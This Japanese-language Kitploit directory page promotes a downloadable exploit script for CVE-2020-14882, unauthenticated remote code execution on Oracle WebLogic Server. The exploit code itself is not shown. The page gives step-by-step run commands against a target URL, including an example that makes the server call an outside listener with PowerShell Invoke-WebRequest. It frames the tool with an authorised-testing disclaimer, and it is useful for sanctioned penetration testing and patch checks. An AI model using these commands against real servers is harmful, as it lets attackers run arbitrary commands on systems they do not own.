Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-14882 — このスクリプトにより、Oracle WebLogic Server上でのリモートコード実行(RCE)が可能になります。 | Kitploit
ツール/GitHubGitHub/danny-lli/cve-2020-14882
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

このスクリプトにより、Oracle WebLogic Server上でのリモートコード実行(RCE)が可能になります。

リポジトリを見る
213年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-14882

このスクリプトは、認証されていないGETリクエストを使用して、Oracle WebLogic Serverでリモートコード実行(RCE)を可能にします。これは脆弱性CVE-2020-14882を悪用します。任意のコマンドを実行することで、攻撃者はサーバーへの不正アクセスを取得できます。

エクスプロイトの詳細

  • エクスプロイトタイトル: Oracle WebLogic Server、GETリクエストによる認証なしRCE
  • エクスプロイト作者: Danny Safaya
  • CVE: CVE-2020-14882
  • ベンダーホームページ: Oracle WebLogic Server
  • ソフトウェアリンク: Oracle Middleware Downloads
  • 詳細情報: WebLogic RCE by only one GET request (CVE-2020-14882) analysis

使用方法

Python 3がインストールされていることを確認してください。このスクリプトを使用するには、以下の手順に従ってください:

  1. ターミナルまたはコマンドプロンプトを開きます。

  2. 以下のコマンドを使用してスクリプトを実行します:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    http(s)://target:7001 をOracle WebLogic ServerのターゲットURLに、command を実行したいコマンドに置き換えてください。

    例1:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    この例では、ターゲットサーバー上で nslookup your_Domain コマンドを実行します。

    例2:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    この例では、ターゲットサーバー上でPowerShellコマンド Invoke-WebRequest -Uri http://your_listener を実行します。

警告

このスクリプトは、許可されたペネトレーションテストおよびセキュリティ研究目的のみでの使用を意図しています。 適切な同意なしにシステムを悪用するためにこのスクリプトを不正使用することは違法であり、法的結果を招く可能性があります。自己責任で使用してください。

依存関係

このスクリプトには以下の依存関係が必要です:

  • requests
  • urllib3

スクリプトを実行する前に、これらの依存関係がインストールされていることを確認してください。

ツールをダウンロード